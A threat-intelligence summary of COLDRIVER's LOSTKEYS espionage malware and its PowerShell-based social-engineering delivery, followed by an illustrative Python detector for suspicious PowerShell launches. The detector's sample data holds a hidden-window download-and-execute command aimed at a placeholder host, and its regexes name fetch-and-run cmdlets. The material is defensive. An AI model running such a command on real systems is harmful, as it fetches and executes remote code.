COLDRIVER, a Russia-linked threat actor, has initiated espionage operations using a new malware called LOSTKEYS, which is designed to steal sensitive files and system information from targets. This malware has been used in several attacks throughout early 2025, notably against current and former government and military advisors, journalists, and NGOs. LOSTKEYS is a departure from COLDRIVER's historical credential phishing attacks, demonstrating the group's evolution in cyber tactics. Its initial engagement uses a deceptive website with social engineering techniques to coax victims into executing harmful commands with PowerShell.
"LOSTKEYS is capable of stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker."
"They are known for stealing credentials, and after gaining access to a target's account, they exfiltrate emails and steal contact lists from the compromised account."
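The delivery step described above (a user coaxed into running a PowerShell command) is usually more visible in endpoint telemetry than the malware itself. As an added example, not taken from the report or from any vendor tooling, the following Python scores constructed process-creation events for the combination a defender would want to surface: PowerShell started from an interactive shell such as explorer.exe rather than a service or scheduled task, with a command line that fetches or evaluates remote or encoded content. The parent-process set, the cmdlet patterns, the hidden-window check and the sample events are all my assumptions for illustration; the report states none of them as indicators.

```python
import re

# Constructed sample process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe", "user": "CORP\\alice",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://stage.example.invalid/x)"'},
    {"parent": "services.exe", "image": "powershell.exe", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe", "user": "CORP\\bob",
     "cmdline": "powershell"},
    {"parent": "code.exe", "image": "powershell.exe", "user": "CORP\\carol",
     "cmdline": "powershell -NoLogo"},
]

# Assumption: these parents indicate a launch driven by a person at the keyboard
# (Run dialog, Start menu, desktop shortcut) rather than by automation.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Assumption: cmdlets and switches commonly used to pull and run a next stage.
REMOTE_EVAL = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b|"
    r"-enc(odedcommand)?\b)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)


def score_event(ev):
    """Return the list of reasons this event looks like user-executed staging."""
    reasons = []
    if ev["image"].lower() != "powershell.exe":
        return reasons
    if ev["parent"].lower() in INTERACTIVE_PARENTS:
        reasons.append("powershell launched from an interactive shell")
    if REMOTE_EVAL.search(ev["cmdline"]):
        reasons.append("command line fetches or evaluates remote/encoded content")
    if HIDDEN_WINDOW.search(ev["cmdline"]):
        reasons.append("window hidden from the user")
    return reasons


def find_suspicious(events, min_reasons=2):
    """Keep events with at least min_reasons indicators; a lone interactive
    launch (a user opening a console) is normal and is not reported."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev["user"], reasons))
    return hits


if __name__ == "__main__":
    for user, reasons in find_suspicious(SAMPLE_EVENTS):
        print(user, "->", "; ".join(reasons))
```

Requiring two independent indicators keeps the alert useful: an administrator opening a console from the Start menu trips only the parent check, while a scheduled backup script trips none, so only the pasted download-and-execute command is reported.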